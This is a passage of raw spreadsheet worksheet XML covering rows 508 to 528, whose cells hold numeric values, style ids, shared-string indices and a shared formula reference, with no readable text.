      <c r="L508" s="15"/>
      <c r="M508" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N508" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O508" s="29">
        <v>1.0</v>
      </c>
      <c r="P508" s="29">
        <v>3.0</v>
      </c>
      <c r="Q508" s="15"/>
      <c r="R508" s="15"/>
      <c r="S508" s="15"/>
      <c r="T508" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U508" s="5"/>
      <c r="V508" s="5"/>
      <c r="W508" s="47"/>
      <c r="X508" s="45"/>
      <c r="Y508" s="45"/>
      <c r="Z508" s="38" t="s">
        <v>2572</v>
      </c>
      <c r="AA508" s="39" t="s">
        <v>2573</v>
      </c>
      <c r="AB508" s="38" t="s">
        <v>2574</v>
      </c>
      <c r="AC508" s="40">
        <v>245059.0</v>
      </c>
      <c r="AD508" s="5"/>
      <c r="AE508" s="14"/>
      <c r="AF508" s="14"/>
    </row>
    <row r="509">
      <c r="A509" s="6">
        <f t="shared" si="1"/>
        <v>0.05708680025</v>
      </c>
      <c r="B509" s="29">
        <v>1.0</v>
      </c>
      <c r="C509" s="15"/>
      <c r="D509" s="14"/>
      <c r="E509" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F509" s="14"/>
      <c r="G509" s="29">
        <v>3.0</v>
      </c>
      <c r="H509" s="29">
        <v>350.0</v>
      </c>
      <c r="I509" s="29">
        <v>108649.0</v>
      </c>
      <c r="J509" s="15"/>
      <c r="K509" s="29">
        <v>108649.0</v>
      </c>
      <c r="L509" s="15"/>
      <c r="M509" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N509" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O509" s="29">
        <v>3.0</v>
      </c>
      <c r="P509" s="29">
        <v>0.0</v>
      </c>
      <c r="Q509" s="15"/>
      <c r="R509" s="15"/>
      <c r="S509" s="15"/>
      <c r="T509" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U509" s="5"/>
      <c r="V509" s="5"/>
      <c r="W509" s="47"/>
      <c r="X509" s="45"/>
      <c r="Y509" s="45"/>
      <c r="Z509" s="38" t="s">
        <v>2575</v>
      </c>
      <c r="AA509" s="39" t="s">
        <v>2576</v>
      </c>
      <c r="AB509" s="38" t="s">
        <v>2577</v>
      </c>
      <c r="AC509" s="40">
        <v>224032.0</v>
      </c>
      <c r="AD509" s="5"/>
      <c r="AE509" s="14"/>
      <c r="AF509" s="14"/>
    </row>
    <row r="510">
      <c r="A510" s="6">
        <f t="shared" si="1"/>
        <v>0.2177136395</v>
      </c>
      <c r="B510" s="29">
        <v>1.0</v>
      </c>
      <c r="C510" s="15"/>
      <c r="D510" s="14"/>
      <c r="E510" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F510" s="14"/>
      <c r="G510" s="29">
        <v>1.0</v>
      </c>
      <c r="H510" s="29">
        <v>10892.0</v>
      </c>
      <c r="I510" s="29">
        <v>230854.0</v>
      </c>
      <c r="J510" s="15"/>
      <c r="K510" s="15"/>
      <c r="L510" s="15"/>
      <c r="M510" s="14"/>
      <c r="N510" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O510" s="29">
        <v>2.0</v>
      </c>
      <c r="P510" s="29">
        <v>1.0</v>
      </c>
      <c r="Q510" s="15"/>
      <c r="R510" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S510" s="15"/>
      <c r="T510" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U510" s="5"/>
      <c r="V510" s="5"/>
      <c r="W510" s="47"/>
      <c r="X510" s="45"/>
      <c r="Y510" s="45"/>
      <c r="Z510" s="38" t="s">
        <v>2578</v>
      </c>
      <c r="AA510" s="39" t="s">
        <v>2579</v>
      </c>
      <c r="AB510" s="38" t="s">
        <v>2580</v>
      </c>
      <c r="AC510" s="40">
        <v>228892.0</v>
      </c>
      <c r="AD510" s="5"/>
      <c r="AE510" s="14"/>
      <c r="AF510" s="14"/>
    </row>
    <row r="511">
      <c r="A511" s="6">
        <f t="shared" si="1"/>
        <v>0.1717690582</v>
      </c>
      <c r="B511" s="29">
        <v>1.0</v>
      </c>
      <c r="C511" s="15"/>
      <c r="D511" s="14"/>
      <c r="E511" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F511" s="14"/>
      <c r="G511" s="29">
        <v>0.0</v>
      </c>
      <c r="H511" s="29">
        <v>302.0</v>
      </c>
      <c r="I511" s="29">
        <v>176321.0</v>
      </c>
      <c r="J511" s="15"/>
      <c r="K511" s="29">
        <v>176321.0</v>
      </c>
      <c r="L511" s="15"/>
      <c r="M511" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N511" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O511" s="29">
        <v>2.0</v>
      </c>
      <c r="P511" s="29">
        <v>4.0</v>
      </c>
      <c r="Q511" s="15"/>
      <c r="R511" s="15"/>
      <c r="S511" s="15"/>
      <c r="T511" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U511" s="5"/>
      <c r="V511" s="5"/>
      <c r="W511" s="47"/>
      <c r="X511" s="45"/>
      <c r="Y511" s="45"/>
      <c r="Z511" s="38" t="s">
        <v>2581</v>
      </c>
      <c r="AA511" s="39" t="s">
        <v>2582</v>
      </c>
      <c r="AB511" s="38" t="s">
        <v>2583</v>
      </c>
      <c r="AC511" s="40">
        <v>266062.0</v>
      </c>
      <c r="AD511" s="5"/>
      <c r="AE511" s="14"/>
      <c r="AF511" s="14"/>
    </row>
    <row r="512">
      <c r="A512" s="6">
        <f t="shared" si="1"/>
        <v>0.4016627895</v>
      </c>
      <c r="B512" s="29">
        <v>1.0</v>
      </c>
      <c r="C512" s="14"/>
      <c r="D512" s="14"/>
      <c r="E512" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F512" s="14"/>
      <c r="G512" s="29">
        <v>1.0</v>
      </c>
      <c r="H512" s="29">
        <v>6042.0</v>
      </c>
      <c r="I512" s="29">
        <v>93032.0</v>
      </c>
      <c r="J512" s="15"/>
      <c r="K512" s="15"/>
      <c r="L512" s="15"/>
      <c r="M512" s="15"/>
      <c r="N512" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O512" s="29">
        <v>1.0</v>
      </c>
      <c r="P512" s="29">
        <v>1.0</v>
      </c>
      <c r="Q512" s="15"/>
      <c r="R512" s="15"/>
      <c r="S512" s="15"/>
      <c r="T512" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U512" s="5"/>
      <c r="V512" s="5"/>
      <c r="W512" s="47"/>
      <c r="X512" s="45"/>
      <c r="Y512" s="45"/>
      <c r="Z512" s="38" t="s">
        <v>2584</v>
      </c>
      <c r="AA512" s="39" t="s">
        <v>2585</v>
      </c>
      <c r="AB512" s="38" t="s">
        <v>2586</v>
      </c>
      <c r="AC512" s="40">
        <v>112497.0</v>
      </c>
      <c r="AD512" s="5"/>
      <c r="AE512" s="14"/>
      <c r="AF512" s="14"/>
    </row>
    <row r="513">
      <c r="A513" s="6">
        <f t="shared" si="1"/>
        <v>0.9409278345</v>
      </c>
      <c r="B513" s="29">
        <v>1.0</v>
      </c>
      <c r="C513" s="29">
        <v>216627.0</v>
      </c>
      <c r="D513" s="14"/>
      <c r="E513" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F513" s="14"/>
      <c r="G513" s="29">
        <v>0.0</v>
      </c>
      <c r="H513" s="29">
        <v>284.0</v>
      </c>
      <c r="I513" s="29">
        <v>132403.0</v>
      </c>
      <c r="J513" s="15"/>
      <c r="K513" s="29">
        <v>132403.0</v>
      </c>
      <c r="L513" s="15"/>
      <c r="M513" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N513" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O513" s="29">
        <v>1.0</v>
      </c>
      <c r="P513" s="29">
        <v>1.0</v>
      </c>
      <c r="Q513" s="15"/>
      <c r="R513" s="15"/>
      <c r="S513" s="15"/>
      <c r="T513" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U513" s="5"/>
      <c r="V513" s="5"/>
      <c r="W513" s="47"/>
      <c r="X513" s="45"/>
      <c r="Y513" s="45"/>
      <c r="Z513" s="38" t="s">
        <v>2587</v>
      </c>
      <c r="AA513" s="39" t="s">
        <v>2588</v>
      </c>
      <c r="AB513" s="38" t="s">
        <v>1319</v>
      </c>
      <c r="AC513" s="40">
        <v>216612.0</v>
      </c>
      <c r="AD513" s="5"/>
      <c r="AE513" s="14"/>
      <c r="AF513" s="14"/>
    </row>
    <row r="514">
      <c r="A514" s="6">
        <f t="shared" si="1"/>
        <v>0.9194075298</v>
      </c>
      <c r="B514" s="29">
        <v>1.0</v>
      </c>
      <c r="C514" s="14"/>
      <c r="D514" s="14"/>
      <c r="E514" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F514" s="14"/>
      <c r="G514" s="29">
        <v>0.0</v>
      </c>
      <c r="H514" s="29">
        <v>333.0</v>
      </c>
      <c r="I514" s="29">
        <v>288816.0</v>
      </c>
      <c r="J514" s="15"/>
      <c r="K514" s="29">
        <v>6253.0</v>
      </c>
      <c r="L514" s="15"/>
      <c r="M514" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N514" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O514" s="29">
        <v>0.0</v>
      </c>
      <c r="P514" s="29">
        <v>8.0</v>
      </c>
      <c r="Q514" s="15"/>
      <c r="R514" s="15"/>
      <c r="S514" s="15"/>
      <c r="T514" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U514" s="5"/>
      <c r="V514" s="5"/>
      <c r="W514" s="47"/>
      <c r="X514" s="45"/>
      <c r="Y514" s="45"/>
      <c r="Z514" s="38" t="s">
        <v>2589</v>
      </c>
      <c r="AA514" s="39" t="s">
        <v>2590</v>
      </c>
      <c r="AB514" s="38" t="s">
        <v>2591</v>
      </c>
      <c r="AC514" s="40">
        <v>268142.0</v>
      </c>
      <c r="AD514" s="5"/>
      <c r="AE514" s="14"/>
      <c r="AF514" s="14"/>
    </row>
    <row r="515">
      <c r="A515" s="6">
        <f t="shared" si="1"/>
        <v>0.3620739139</v>
      </c>
      <c r="B515" s="29">
        <v>1.0</v>
      </c>
      <c r="C515" s="14"/>
      <c r="D515" s="14"/>
      <c r="E515" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F515" s="14"/>
      <c r="G515" s="29">
        <v>2.0</v>
      </c>
      <c r="H515" s="29">
        <v>238.0</v>
      </c>
      <c r="I515" s="29">
        <v>40463.0</v>
      </c>
      <c r="J515" s="15"/>
      <c r="K515" s="29">
        <v>40463.0</v>
      </c>
      <c r="L515" s="15"/>
      <c r="M515" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N515" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O515" s="29">
        <v>2.0</v>
      </c>
      <c r="P515" s="29">
        <v>2.0</v>
      </c>
      <c r="Q515" s="15"/>
      <c r="R515" s="15"/>
      <c r="S515" s="15"/>
      <c r="T515" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U515" s="5"/>
      <c r="V515" s="5"/>
      <c r="W515" s="47"/>
      <c r="X515" s="45"/>
      <c r="Y515" s="45"/>
      <c r="Z515" s="38" t="s">
        <v>2592</v>
      </c>
      <c r="AA515" s="39" t="s">
        <v>2593</v>
      </c>
      <c r="AB515" s="38" t="s">
        <v>2485</v>
      </c>
      <c r="AC515" s="40">
        <v>123846.0</v>
      </c>
      <c r="AD515" s="5"/>
      <c r="AE515" s="14"/>
      <c r="AF515" s="14"/>
    </row>
    <row r="516">
      <c r="A516" s="6">
        <f t="shared" si="1"/>
        <v>0.05392982726</v>
      </c>
      <c r="B516" s="29">
        <v>1.0</v>
      </c>
      <c r="C516" s="15"/>
      <c r="D516" s="14"/>
      <c r="E516" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F516" s="14"/>
      <c r="G516" s="29">
        <v>51.0</v>
      </c>
      <c r="H516" s="29">
        <v>10781.0</v>
      </c>
      <c r="I516" s="29">
        <v>232263.0</v>
      </c>
      <c r="J516" s="15"/>
      <c r="K516" s="29">
        <v>232263.0</v>
      </c>
      <c r="L516" s="15"/>
      <c r="M516" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N516" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O516" s="29">
        <v>6.0</v>
      </c>
      <c r="P516" s="29">
        <v>10.0</v>
      </c>
      <c r="Q516" s="15"/>
      <c r="R516" s="15"/>
      <c r="S516" s="15"/>
      <c r="T516" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U516" s="5"/>
      <c r="V516" s="5"/>
      <c r="W516" s="47"/>
      <c r="X516" s="45"/>
      <c r="Y516" s="45"/>
      <c r="Z516" s="38" t="s">
        <v>2594</v>
      </c>
      <c r="AA516" s="39" t="s">
        <v>2595</v>
      </c>
      <c r="AB516" s="38" t="s">
        <v>2596</v>
      </c>
      <c r="AC516" s="40">
        <v>229841.0</v>
      </c>
      <c r="AD516" s="5"/>
      <c r="AE516" s="14"/>
      <c r="AF516" s="14"/>
    </row>
    <row r="517">
      <c r="A517" s="6">
        <f t="shared" si="1"/>
        <v>0.7766621054</v>
      </c>
      <c r="B517" s="29">
        <v>1.0</v>
      </c>
      <c r="C517" s="15"/>
      <c r="D517" s="14"/>
      <c r="E517" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F517" s="14"/>
      <c r="G517" s="29">
        <v>0.0</v>
      </c>
      <c r="H517" s="29">
        <v>157.0</v>
      </c>
      <c r="I517" s="29">
        <v>140514.0</v>
      </c>
      <c r="J517" s="15"/>
      <c r="K517" s="15"/>
      <c r="L517" s="15"/>
      <c r="M517" s="15"/>
      <c r="N517" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O517" s="29">
        <v>3.0</v>
      </c>
      <c r="P517" s="29">
        <v>0.0</v>
      </c>
      <c r="Q517" s="15"/>
      <c r="R517" s="15"/>
      <c r="S517" s="15"/>
      <c r="T517" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U517" s="5"/>
      <c r="V517" s="5"/>
      <c r="W517" s="47"/>
      <c r="X517" s="45"/>
      <c r="Y517" s="45"/>
      <c r="Z517" s="38" t="s">
        <v>2597</v>
      </c>
      <c r="AA517" s="39" t="s">
        <v>2598</v>
      </c>
      <c r="AB517" s="38" t="s">
        <v>1463</v>
      </c>
      <c r="AC517" s="40">
        <v>159760.0</v>
      </c>
      <c r="AD517" s="5"/>
      <c r="AE517" s="14"/>
      <c r="AF517" s="14"/>
    </row>
    <row r="518">
      <c r="A518" s="6">
        <f t="shared" si="1"/>
        <v>0.2366089299</v>
      </c>
      <c r="B518" s="29">
        <v>1.0</v>
      </c>
      <c r="C518" s="29">
        <v>117452.0</v>
      </c>
      <c r="D518" s="14"/>
      <c r="E518" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F518" s="14"/>
      <c r="G518" s="29">
        <v>6.0</v>
      </c>
      <c r="H518" s="29">
        <v>8419.0</v>
      </c>
      <c r="I518" s="29">
        <v>49974.0</v>
      </c>
      <c r="J518" s="15"/>
      <c r="K518" s="15"/>
      <c r="L518" s="15"/>
      <c r="M518" s="15"/>
      <c r="N518" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O518" s="29">
        <v>1.0</v>
      </c>
      <c r="P518" s="29">
        <v>2.0</v>
      </c>
      <c r="Q518" s="15"/>
      <c r="R518" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S518" s="15"/>
      <c r="T518" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U518" s="5"/>
      <c r="V518" s="5"/>
      <c r="W518" s="47"/>
      <c r="X518" s="45"/>
      <c r="Y518" s="45"/>
      <c r="Z518" s="38" t="s">
        <v>2599</v>
      </c>
      <c r="AA518" s="39" t="s">
        <v>2600</v>
      </c>
      <c r="AB518" s="38" t="s">
        <v>2601</v>
      </c>
      <c r="AC518" s="40">
        <v>117370.0</v>
      </c>
      <c r="AD518" s="5"/>
      <c r="AE518" s="14"/>
      <c r="AF518" s="14"/>
    </row>
    <row r="519">
      <c r="A519" s="6">
        <f t="shared" si="1"/>
        <v>0.3773435717</v>
      </c>
      <c r="B519" s="29">
        <v>1.0</v>
      </c>
      <c r="C519" s="14"/>
      <c r="D519" s="14"/>
      <c r="E519" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F519" s="14"/>
      <c r="G519" s="29">
        <v>0.0</v>
      </c>
      <c r="H519" s="29">
        <v>1103.0</v>
      </c>
      <c r="I519" s="29">
        <v>241967.0</v>
      </c>
      <c r="J519" s="15"/>
      <c r="K519" s="29">
        <v>98538.0</v>
      </c>
      <c r="L519" s="15"/>
      <c r="M519" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N519" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O519" s="29">
        <v>1.0</v>
      </c>
      <c r="P519" s="29">
        <v>0.0</v>
      </c>
      <c r="Q519" s="15"/>
      <c r="R519" s="15"/>
      <c r="S519" s="15"/>
      <c r="T519" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U519" s="5"/>
      <c r="V519" s="5"/>
      <c r="W519" s="47"/>
      <c r="X519" s="45"/>
      <c r="Y519" s="45"/>
      <c r="Z519" s="38" t="s">
        <v>2602</v>
      </c>
      <c r="AA519" s="39" t="s">
        <v>2603</v>
      </c>
      <c r="AB519" s="38" t="s">
        <v>2604</v>
      </c>
      <c r="AC519" s="40">
        <v>246261.0</v>
      </c>
      <c r="AD519" s="5"/>
      <c r="AE519" s="14"/>
      <c r="AF519" s="14"/>
    </row>
    <row r="520">
      <c r="A520" s="6">
        <f t="shared" si="1"/>
        <v>0.8803191676</v>
      </c>
      <c r="B520" s="29">
        <v>1.0</v>
      </c>
      <c r="C520" s="29">
        <v>35707.0</v>
      </c>
      <c r="D520" s="14"/>
      <c r="E520" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F520" s="14"/>
      <c r="G520" s="29">
        <v>6.0</v>
      </c>
      <c r="H520" s="29">
        <v>364.0</v>
      </c>
      <c r="I520" s="29">
        <v>25823.0</v>
      </c>
      <c r="J520" s="5" t="s">
        <v>2605</v>
      </c>
      <c r="L520" s="15"/>
      <c r="M520" s="15"/>
      <c r="N520" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O520" s="29">
        <v>4.0</v>
      </c>
      <c r="P520" s="29">
        <v>4.0</v>
      </c>
      <c r="Q520" s="15"/>
      <c r="R520" s="15"/>
      <c r="S520" s="15"/>
      <c r="T520" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U520" s="5"/>
      <c r="V520" s="5"/>
      <c r="W520" s="47"/>
      <c r="X520" s="45"/>
      <c r="Y520" s="45"/>
      <c r="Z520" s="38" t="s">
        <v>2606</v>
      </c>
      <c r="AA520" s="39" t="s">
        <v>2607</v>
      </c>
      <c r="AB520" s="38" t="s">
        <v>1777</v>
      </c>
      <c r="AC520" s="40">
        <v>35702.0</v>
      </c>
      <c r="AD520" s="5"/>
      <c r="AE520" s="14"/>
      <c r="AF520" s="14"/>
    </row>
    <row r="521">
      <c r="A521" s="6">
        <f t="shared" si="1"/>
        <v>0.02890080866</v>
      </c>
      <c r="B521" s="29">
        <v>1.0</v>
      </c>
      <c r="C521" s="29">
        <v>44244.0</v>
      </c>
      <c r="D521" s="14"/>
      <c r="E521" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F521" s="14"/>
      <c r="G521" s="29">
        <v>2.0</v>
      </c>
      <c r="H521" s="29">
        <v>843.0</v>
      </c>
      <c r="I521" s="29">
        <v>32287.0</v>
      </c>
      <c r="J521" s="15"/>
      <c r="K521" s="29">
        <v>32287.0</v>
      </c>
      <c r="L521" s="15"/>
      <c r="M521" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N521" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O521" s="29">
        <v>3.0</v>
      </c>
      <c r="P521" s="29">
        <v>0.0</v>
      </c>
      <c r="Q521" s="15"/>
      <c r="R521" s="15"/>
      <c r="S521" s="15"/>
      <c r="T521" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U521" s="5"/>
      <c r="V521" s="5"/>
      <c r="W521" s="47"/>
      <c r="X521" s="45"/>
      <c r="Y521" s="45"/>
      <c r="Z521" s="38" t="s">
        <v>2608</v>
      </c>
      <c r="AA521" s="39" t="s">
        <v>2609</v>
      </c>
      <c r="AB521" s="38" t="s">
        <v>2610</v>
      </c>
      <c r="AC521" s="40">
        <v>44234.0</v>
      </c>
      <c r="AD521" s="5"/>
      <c r="AE521" s="14"/>
      <c r="AF521" s="14"/>
    </row>
    <row r="522">
      <c r="A522" s="6">
        <f t="shared" si="1"/>
        <v>0.7709650776</v>
      </c>
      <c r="B522" s="29">
        <v>1.0</v>
      </c>
      <c r="C522" s="15"/>
      <c r="D522" s="14"/>
      <c r="E522" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F522" s="14"/>
      <c r="G522" s="29">
        <v>1.0</v>
      </c>
      <c r="H522" s="29">
        <v>598.0</v>
      </c>
      <c r="I522" s="29">
        <v>10160.0</v>
      </c>
      <c r="J522" s="15"/>
      <c r="K522" s="29">
        <v>10160.0</v>
      </c>
      <c r="L522" s="15"/>
      <c r="M522" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N522" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O522" s="29">
        <v>2.0</v>
      </c>
      <c r="P522" s="29">
        <v>1.0</v>
      </c>
      <c r="Q522" s="15"/>
      <c r="R522" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S522" s="15"/>
      <c r="T522" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U522" s="5"/>
      <c r="V522" s="5"/>
      <c r="W522" s="47"/>
      <c r="X522" s="45"/>
      <c r="Y522" s="45"/>
      <c r="Z522" s="38" t="s">
        <v>2611</v>
      </c>
      <c r="AA522" s="39" t="s">
        <v>2612</v>
      </c>
      <c r="AB522" s="38" t="s">
        <v>2613</v>
      </c>
      <c r="AC522" s="40">
        <v>85162.0</v>
      </c>
      <c r="AD522" s="5"/>
      <c r="AE522" s="14"/>
      <c r="AF522" s="14"/>
    </row>
    <row r="523">
      <c r="A523" s="6">
        <f t="shared" si="1"/>
        <v>0.6681855995</v>
      </c>
      <c r="B523" s="29">
        <v>1.0</v>
      </c>
      <c r="C523" s="14"/>
      <c r="D523" s="14"/>
      <c r="E523" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F523" s="14"/>
      <c r="G523" s="29">
        <v>1.0</v>
      </c>
      <c r="H523" s="29">
        <v>2039.0</v>
      </c>
      <c r="I523" s="29">
        <v>134545.0</v>
      </c>
      <c r="J523" s="15"/>
      <c r="K523" s="29">
        <v>-1.0</v>
      </c>
      <c r="L523" s="15"/>
      <c r="M523" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N523" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O523" s="29">
        <v>2.0</v>
      </c>
      <c r="P523" s="29">
        <v>5.0</v>
      </c>
      <c r="Q523" s="15"/>
      <c r="R523" s="15"/>
      <c r="S523" s="15"/>
      <c r="T523" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U523" s="5"/>
      <c r="V523" s="5"/>
      <c r="W523" s="47"/>
      <c r="X523" s="45"/>
      <c r="Y523" s="45"/>
      <c r="Z523" s="38" t="s">
        <v>2614</v>
      </c>
      <c r="AA523" s="39" t="s">
        <v>2615</v>
      </c>
      <c r="AB523" s="38" t="s">
        <v>2616</v>
      </c>
      <c r="AC523" s="40">
        <v>146546.0</v>
      </c>
      <c r="AD523" s="5"/>
      <c r="AE523" s="14"/>
      <c r="AF523" s="14"/>
    </row>
    <row r="524">
      <c r="A524" s="6">
        <f t="shared" si="1"/>
        <v>0.5954205751</v>
      </c>
      <c r="B524" s="29">
        <v>1.0</v>
      </c>
      <c r="C524" s="14"/>
      <c r="D524" s="14"/>
      <c r="E524" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F524" s="14"/>
      <c r="G524" s="29">
        <v>2.0</v>
      </c>
      <c r="H524" s="29">
        <v>2433.0</v>
      </c>
      <c r="I524" s="29">
        <v>9778.0</v>
      </c>
      <c r="J524" s="15"/>
      <c r="K524" s="15"/>
      <c r="L524" s="15"/>
      <c r="M524" s="15"/>
      <c r="N524" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O524" s="29">
        <v>3.0</v>
      </c>
      <c r="P524" s="29">
        <v>0.0</v>
      </c>
      <c r="Q524" s="15"/>
      <c r="R524" s="15"/>
      <c r="S524" s="15"/>
      <c r="T524" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U524" s="5"/>
      <c r="V524" s="5"/>
      <c r="W524" s="47"/>
      <c r="X524" s="45"/>
      <c r="Y524" s="45"/>
      <c r="Z524" s="38" t="s">
        <v>2617</v>
      </c>
      <c r="AA524" s="39" t="s">
        <v>2618</v>
      </c>
      <c r="AB524" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC524" s="40">
        <v>48997.0</v>
      </c>
      <c r="AD524" s="5"/>
      <c r="AE524" s="14"/>
      <c r="AF524" s="14"/>
    </row>
    <row r="525">
      <c r="A525" s="6">
        <f t="shared" si="1"/>
        <v>0.06492427564</v>
      </c>
      <c r="B525" s="29">
        <v>1.0</v>
      </c>
      <c r="C525" s="29">
        <v>216270.0</v>
      </c>
      <c r="D525" s="14"/>
      <c r="E525" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F525" s="14"/>
      <c r="G525" s="29">
        <v>0.0</v>
      </c>
      <c r="H525" s="29">
        <v>286.0</v>
      </c>
      <c r="I525" s="29">
        <v>215447.0</v>
      </c>
      <c r="J525" s="15"/>
      <c r="K525" s="29">
        <v>6253.0</v>
      </c>
      <c r="L525" s="15"/>
      <c r="M525" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N525" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O525" s="29">
        <v>3.0</v>
      </c>
      <c r="P525" s="29">
        <v>10.0</v>
      </c>
      <c r="Q525" s="15"/>
      <c r="R525" s="15"/>
      <c r="S525" s="15"/>
      <c r="T525" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U525" s="5"/>
      <c r="V525" s="5"/>
      <c r="W525" s="47"/>
      <c r="X525" s="45"/>
      <c r="Y525" s="45"/>
      <c r="Z525" s="38" t="s">
        <v>2619</v>
      </c>
      <c r="AA525" s="39" t="s">
        <v>2620</v>
      </c>
      <c r="AB525" s="38" t="s">
        <v>1531</v>
      </c>
      <c r="AC525" s="40">
        <v>216035.0</v>
      </c>
      <c r="AD525" s="5"/>
      <c r="AE525" s="14"/>
      <c r="AF525" s="14"/>
    </row>
    <row r="526">
      <c r="A526" s="6">
        <f t="shared" si="1"/>
        <v>0.7745109173</v>
      </c>
      <c r="B526" s="29">
        <v>1.0</v>
      </c>
      <c r="C526" s="29">
        <v>153700.0</v>
      </c>
      <c r="D526" s="14"/>
      <c r="E526" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F526" s="14"/>
      <c r="G526" s="29">
        <v>1.0</v>
      </c>
      <c r="H526" s="29">
        <v>186.0</v>
      </c>
      <c r="I526" s="29">
        <v>105248.0</v>
      </c>
      <c r="J526" s="15"/>
      <c r="K526" s="29">
        <v>105248.0</v>
      </c>
      <c r="L526" s="15"/>
      <c r="M526" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N526" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O526" s="29">
        <v>2.0</v>
      </c>
      <c r="P526" s="29">
        <v>0.0</v>
      </c>
      <c r="Q526" s="15"/>
      <c r="R526" s="15"/>
      <c r="S526" s="15"/>
      <c r="T526" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U526" s="5"/>
      <c r="V526" s="5"/>
      <c r="W526" s="47"/>
      <c r="X526" s="45"/>
      <c r="Y526" s="45"/>
      <c r="Z526" s="38" t="s">
        <v>2621</v>
      </c>
      <c r="AA526" s="39" t="s">
        <v>2622</v>
      </c>
      <c r="AB526" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC526" s="40">
        <v>153698.0</v>
      </c>
      <c r="AD526" s="5"/>
      <c r="AE526" s="14"/>
      <c r="AF526" s="14"/>
    </row>
    <row r="527">
      <c r="A527" s="6">
        <f t="shared" si="1"/>
        <v>0.8649067475</v>
      </c>
      <c r="B527" s="29">
        <v>1.0</v>
      </c>
      <c r="C527" s="15"/>
      <c r="D527" s="14"/>
      <c r="E527" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F527" s="14"/>
      <c r="G527" s="29">
        <v>2.0</v>
      </c>
      <c r="H527" s="29">
        <v>227.0</v>
      </c>
      <c r="I527" s="29">
        <v>84574.0</v>
      </c>
      <c r="J527" s="15"/>
      <c r="K527" s="29">
        <v>-1.0</v>
      </c>
      <c r="L527" s="5" t="s">
        <v>1241</v>
      </c>
      <c r="M527" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N527" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O527" s="29">
        <v>3.0</v>
      </c>
      <c r="P527" s="29">
        <v>10.0</v>
      </c>
      <c r="Q527" s="15"/>
      <c r="R527" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S527" s="15"/>
      <c r="T527" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U527" s="5"/>
      <c r="V527" s="5"/>
      <c r="W527" s="47"/>
      <c r="X527" s="45"/>
      <c r="Y527" s="45"/>
      <c r="Z527" s="38" t="s">
        <v>2623</v>
      </c>
      <c r="AA527" s="39" t="s">
        <v>2624</v>
      </c>
      <c r="AB527" s="38" t="s">
        <v>2625</v>
      </c>
      <c r="AC527" s="40">
        <v>98023.0</v>
      </c>
      <c r="AD527" s="5"/>
      <c r="AE527" s="14"/>
      <c r="AF527" s="14"/>
    </row>
    <row r="528">
      <c r="A528" s="6">
